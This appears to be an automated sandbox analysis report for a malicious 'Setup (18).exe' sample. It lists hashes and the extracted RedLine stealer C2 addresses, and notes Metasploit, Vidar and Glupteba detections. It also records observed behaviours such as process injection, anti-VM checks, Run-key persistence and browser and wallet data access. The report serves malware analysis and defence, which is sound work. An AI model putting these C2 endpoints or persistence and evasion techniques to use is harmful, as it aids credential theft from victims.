Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
1801s -
max time network
1808s -
platform
windows11_x64 -
resource
win11 -
submitted
01-09-2021 13:04
Static task
static1
Behavioral task
behavioral1
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (18).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
bratanchikAYE
45.14.49.232:63850
Extracted
metasploit
windows/single_exec
Extracted
redline
1
37.0.8.88:44263
Extracted
redline
NORMAN2
45.14.49.184:27587
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral2/memory/1360-296-0x00000000046C0000-0x0000000004FE6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2236 5764 rundll32.exe 175 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7792 5764 rUNdlL32.eXe 175 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8696 5764 rundll32.exe 175 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 16 IoCs
resource yara_rule behavioral2/files/0x000100000002b1e4-192.dat family_redline behavioral2/files/0x000100000002b1e4-219.dat family_redline behavioral2/memory/1736-341-0x0000000000400000-0x000000000044A000-memory.dmp family_redline behavioral2/memory/1736-337-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/1644-322-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/1644-317-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/2564-368-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/2396-397-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/4984-379-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/2856-418-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/4824-423-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/5308-450-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/5676-489-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/6128-501-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/6000-536-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/5664-540-0x0000000000000000-mapping.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 27 IoCs
description pid Process procid_target PID 548 created 468 548 WerFault.exe 91 PID 3392 created 1976 3392 WerFault.exe 99 PID 4148 created 1196 4148 WerFault.exe 81 PID 3608 created 3196 3608 WerFault.exe 93 PID 3036 created 1180 3036 WerFault.exe 85 PID 2900 created 1060 2900 WerFault.exe 80 PID 2924 created 1360 2924 W3SGPRNzsnviCFwyWGjWU3KW.exe 83 PID 5172 created 2396 5172 WerFault.exe 146 PID 6140 created 2324 6140 WerFault.exe 216 PID 5568 created 2136 5568 6lSzGpKBNwPTtXTimMDJulCB.exe 100 PID 3480 created 5412 3480 WerFault.exe 189 PID 5640 created 5404 5640 WerFault.exe 186 PID 4528 created 3092 4528 lncqVKD1n8Hm65KL2PVGDQde.exe 211 PID 6596 created 7116 6596 WerFault.exe 457 PID 5688 created 584 5688 WerFault.exe 254 PID 7796 created 7560 7796 WerFault.exe 430 PID 7492 created 3540 7492 WerFault.exe 443 PID 6588 created 2160 6588 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 439 PID 9112 created 1616 9112 WerFault.exe 317 PID 9176 created 5572 9176 WerFault.exe 171 PID 4644 created 7408 4644 W3SGPRNzsnviCFwyWGjWU3KW.exe 322 PID 9184 created 8008 9184 WerFault.exe 697 PID 8448 created 5004 8448 WerFault.exe 324 PID 9164 created 8920 9164 WerFault.exe 740 PID 7968 created 7960 7968 WerFault.exe 321 PID 2792 created 5704 2792 WerFault.exe 418 PID 3276 created 3520 3276 W3SGPRNzsnviCFwyWGjWU3KW.exe 314 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/2324-464-0x00000000008C0000-0x0000000000993000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 1492 7glI7txA9mjGcEeaSo4MST6J.exe 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 1772 r89nXplmqQE5PqLkZO2pCalF.exe 1168 uabPgkiZMD2YJuHV5d3rbwBJ.exe 1976 EL5io2uTzLL3ue6KpQ4V_KCd.exe 2136 ySoHJe_87EJoVpP6wkVVHV_W.exe 2324 9igzZbIMLPjx5gchNZqBLVB2.exe 2536 Tz4kBSsK8ii3PudsbF84i4VD.exe 1060 YNB1ySiHyFM9Z1eqrhee6Ulg.exe 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 1108 K881cE9ZARVUqncSaZBmTZq6.exe 3204 Qy6qE9ZI7Djrb_apEAlf61NL.exe 1000 fngXcmjsam0oJRnstReCykOV.exe 468 yHiCplLxrI4T5LLnVx6XVlNj.exe 1132 fA8YUw_bCw4n8NoOFcuKKYLJ.exe 680 O0GjO4BxRBaQwuHKn8sPaAFp.exe 1452 6OUn4xmB6r0O7c3V5b7YH6lz.exe 3196 40Dbba5JzkHguF5BHFE7sdfW.exe 1280 ed5TJd6VV6OEfHKZtdS0STNO.exe 1360 COBGICT1h3fxj2Ecl5f_phT6.exe 1180 y2Ht6KicHQKo4tZc9FPphh08.exe 1196 TamxLXMKExCKD_Z9p9V0UrUs.exe 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 1652 ikQKjhB4k6HEzP8ctwvkUexr.exe 3472 inst001.exe 4320 cutm3.exe 4324 md8_8eus.exe 3984 ikQKjhB4k6HEzP8ctwvkUexr.tmp 1280 uabPgkiZMD2YJuHV5d3rbwBJ.exe 5100 J77cmUgJX0OQi4nZtiqUPG2L.exe 4536 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 3172 KRkNvH~YgUUt9O.exE 1644 W3SGPRNzsnviCFwyWGjWU3KW.exe 1736 6lSzGpKBNwPTtXTimMDJulCB.exe 3540 cffV7V85xgfY_2SwymHpsGHL.exe 2160 wmiprvse.exe 4624 7012397.exe 5084 5145572.exe 2564 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 4984 W3SGPRNzsnviCFwyWGjWU3KW.exe 3156 5982993.exe 4688 4534878.exe 2396 6lSzGpKBNwPTtXTimMDJulCB.exe 3492 6209719.exe 5152 3479057.exe 2856 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 4824 W3SGPRNzsnviCFwyWGjWU3KW.exe 5572 8975748.exe 5308 6lSzGpKBNwPTtXTimMDJulCB.exe 5704 6lSzGpKBNwPTtXTimMDJulCB.exe 5792 W3SGPRNzsnviCFwyWGjWU3KW.exe 5676 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 6128 6lSzGpKBNwPTtXTimMDJulCB.exe 5404 UEAOsf8jAmHJ8JCJ9YAOo57Z.exe 2316 AIIy1ibSgK26QPojGs_p89LL.exe 6000 6lSzGpKBNwPTtXTimMDJulCB.exe 5584 W3SGPRNzsnviCFwyWGjWU3KW.exe 5376 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 5664 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 5960 W3SGPRNzsnviCFwyWGjWU3KW.exe 3840 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 5568 6lSzGpKBNwPTtXTimMDJulCB.exe 5144 WinHoster.exe 2780 W3SGPRNzsnviCFwyWGjWU3KW.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6OUn4xmB6r0O7c3V5b7YH6lz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6OUn4xmB6r0O7c3V5b7YH6lz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6lSzGpKBNwPTtXTimMDJulCB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6lSzGpKBNwPTtXTimMDJulCB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cffV7V85xgfY_2SwymHpsGHL.exe -
Loads dropped DLL 9 IoCs
pid Process 3984 ikQKjhB4k6HEzP8ctwvkUexr.tmp 3984 ikQKjhB4k6HEzP8ctwvkUexr.tmp 5412 rundll32.exe 6576 stats.tmp 6576 stats.tmp 5460 9840432e051a6fa1192594db02b80a4c1fd73456.exe 7560 7367918.exe 4800 CS890nXv0hCVBEpD8Upfh0t0.tmp 4800 CS890nXv0hCVBEpD8Upfh0t0.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000100000002b1f3-195.dat themida behavioral2/files/0x000100000002b1ee-194.dat themida behavioral2/files/0x000100000002b1ee-216.dat themida behavioral2/files/0x000100000002b1f3-214.dat themida behavioral2/memory/1452-298-0x0000000000AA0000-0x0000000000AA1000-memory.dmp themida behavioral2/memory/680-313-0x00000000008C0000-0x00000000008C1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 7012397.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce cffV7V85xgfY_2SwymHpsGHL.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" cffV7V85xgfY_2SwymHpsGHL.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6OUn4xmB6r0O7c3V5b7YH6lz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6lSzGpKBNwPTtXTimMDJulCB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bE4PE_CzBBGzIejwmqWOO68V.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 16 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 api.db-ip.com 23 ipinfo.io 85 ipinfo.io 219 ipinfo.io 25 api.db-ip.com 400 ipinfo.io 619 ipinfo.io 1 ip-api.com 1 ipinfo.io 4 ipinfo.io 109 ipinfo.io 166 ipinfo.io 92 ipinfo.io 220 ipinfo.io 460 ipinfo.io 468 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1452 6OUn4xmB6r0O7c3V5b7YH6lz.exe 680 6lSzGpKBNwPTtXTimMDJulCB.exe 6232 cffV7V85xgfY_2SwymHpsGHL.exe 4552 bE4PE_CzBBGzIejwmqWOO68V.exe -
Suspicious use of SetThreadContext 56 IoCs
description pid Process procid_target PID 1156 set thread context of 1644 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 138 PID 1204 set thread context of 1736 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 135 PID 1704 set thread context of 2564 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 144 PID 1156 set thread context of 4984 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 151 PID 1204 set thread context of 2396 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 146 PID 1704 set thread context of 2856 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 157 PID 1156 set thread context of 4824 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 170 PID 1204 set thread context of 5308 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 162 PID 1704 set thread context of 5676 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 176 PID 1204 set thread context of 6128 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 178 PID 1204 set thread context of 6000 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 183 PID 1156 set thread context of 5584 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 182 PID 1704 set thread context of 5664 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 181 PID 1156 set thread context of 5960 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 193 PID 1704 set thread context of 3840 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 192 PID 1204 set thread context of 5568 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 191 PID 1156 set thread context of 2780 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 197 PID 1704 set thread context of 3996 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 195 PID 1204 set thread context of 3232 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 199 PID 1156 set thread context of 5380 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 200 PID 1704 set thread context of 5600 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 203 PID 1204 set thread context of 5128 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 202 PID 1704 set thread context of 5132 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 207 PID 1204 set thread context of 4260 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 209 PID 1704 set thread context of 3092 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 211 PID 1156 set thread context of 3716 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 214 PID 1704 set thread context of 5684 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 218 PID 1204 set thread context of 2956 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 219 PID 1156 set thread context of 6400 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 232 PID 1204 set thread context of 6920 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 238 PID 1704 set thread context of 7116 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 457 PID 1156 set thread context of 7040 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 239 PID 1156 set thread context of 3128 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 245 PID 1156 set thread context of 6868 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 251 PID 1704 set thread context of 584 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 254 PID 1204 set thread context of 6632 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 255 PID 1156 set thread context of 5164 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 268 PID 1704 set thread context of 5488 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 259 PID 1156 set thread context of 3868 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 263 PID 1704 set thread context of 7348 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 265 PID 1204 set thread context of 7612 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 270 PID 1704 set thread context of 7928 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 281 PID 1492 set thread context of 7700 1492 W3SGPRNzsnviCFwyWGjWU3KW.exe 286 PID 1704 set thread context of 7384 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 330 PID 1156 set thread context of 7920 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 291 PID 1204 set thread context of 7312 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 325 PID 1704 set thread context of 1624 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 327 PID 1156 set thread context of 1492 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 326 PID 1704 set thread context of 8792 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 334 PID 1156 set thread context of 8824 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 1513 PID 1204 set thread context of 7176 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 343 PID 1704 set thread context of 8644 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 345 PID 1156 set thread context of 8844 1156 W3SGPRNzsnviCFwyWGjWU3KW.exe 349 PID 1204 set thread context of 9204 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 351 PID 1704 set thread context of 9088 1704 _5oKSJ7ZYr2cbO6dLHZ0bKph.exe 366 PID 1204 set thread context of 8756 1204 6lSzGpKBNwPTtXTimMDJulCB.exe 363 -
Drops file in Program Files directory 26 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe uabPgkiZMD2YJuHV5d3rbwBJ.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe wRb3Dw54wL4kb3xO9e5v3xe7.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 8zIwjgWyoEwFmgC_Y4nZWwBf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe uabPgkiZMD2YJuHV5d3rbwBJ.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini uabPgkiZMD2YJuHV5d3rbwBJ.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Tz4kBSsK8ii3PudsbF84i4VD.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 8zIwjgWyoEwFmgC_Y4nZWwBf.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe uabPgkiZMD2YJuHV5d3rbwBJ.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Tz4kBSsK8ii3PudsbF84i4VD.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Uninstall.exe _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe wRb3Dw54wL4kb3xO9e5v3xe7.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe uabPgkiZMD2YJuHV5d3rbwBJ.exe File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File created C:\Program Files (x86)\SmartPDF\SmartPDF\Uninstall.ini _5oKSJ7ZYr2cbO6dLHZ0bKph.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
pid pid_target Process procid_target 1456 1976 WerFault.exe 99 4980 468 WerFault.exe 91 3024 1196 WerFault.exe 81 1632 3196 WerFault.exe 93 2068 1360 WerFault.exe 83 5528 2396 WerFault.exe 146 2848 2324 WerFault.exe 101 4644 2136 WerFault.exe 100 5088 5412 WerFault.exe 189 4448 5404 WerFault.exe 186 6276 3092 WerFault.exe 211 7060 7116 WerFault.exe 240 8360 3540 WerFault.exe 145 5832 7560 WerFault.exe 293 8872 2160 WerFault.exe 150 8712 3540 WerFault.exe 145 9200 2160 WerFault.exe 150 4576 5572 WerFault.exe 171 8076 1616 WerFault.exe 317 9184 8920 WerFault.exe 336 7820 6636 WerFault.exe 307 6384 3788 WerFault.exe 297 4992 9532 WerFault.exe 395 3472 5532 WerFault.exe 222 6648 9380 WerFault.exe 449 3668 6388 WerFault.exe 233 10012 6584 WerFault.exe 478 6092 6584 WerFault.exe 478 10496 5980 WerFault.exe 497 10700 4244 WerFault.exe 476 10440 5180 WerFault.exe 260 6764 7688 WerFault.exe 287 10416 8308 WerFault.exe 543 9344 9788 WerFault.exe 558 8344 3532 WerFault.exe 577 7128 8624 WerFault.exe 421 9112 8236 WerFault.exe 389 9276 10072 WerFault.exe 382 7084 9156 WerFault.exe 423 10276 11220 WerFault.exe 523 4240 1420 WerFault.exe 539 9636 9772 WerFault.exe 703 9460 9052 WerFault.exe 710 9972 10804 WerFault.exe 727 11136 11208 WerFault.exe 758 10404 5852 WerFault.exe 809 11464 6680 WerFault.exe 855 2508 12996 WerFault.exe 891 4200 7780 WerFault.exe 915 13516 13832 WerFault.exe 934 14128 9236 WerFault.exe 979 11808 6188 WerFault.exe 997 4208 8600 WerFault.exe 1006 4048 12916 WerFault.exe 1024 14008 4644 WerFault.exe 1034 10748 12708 WerFault.exe 1072 14444 12676 WerFault.exe 1077 9556 12676 WerFault.exe 1119 16132 4324 WerFault.exe 122 12260 11348 Process not Found 1161 17220 16552 Process not Found 1195 12836 13240 Process not Found 1228 11228 10792 Process not Found 1229 16696 3988 Process not Found 1257 -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz W3SGPRNzsnviCFwyWGjWU3KW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier W3SGPRNzsnviCFwyWGjWU3KW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 W3SGPRNzsnviCFwyWGjWU3KW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cffV7V85xgfY_2SwymHpsGHL.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier W3SGPRNzsnviCFwyWGjWU3KW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cffV7V85xgfY_2SwymHpsGHL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 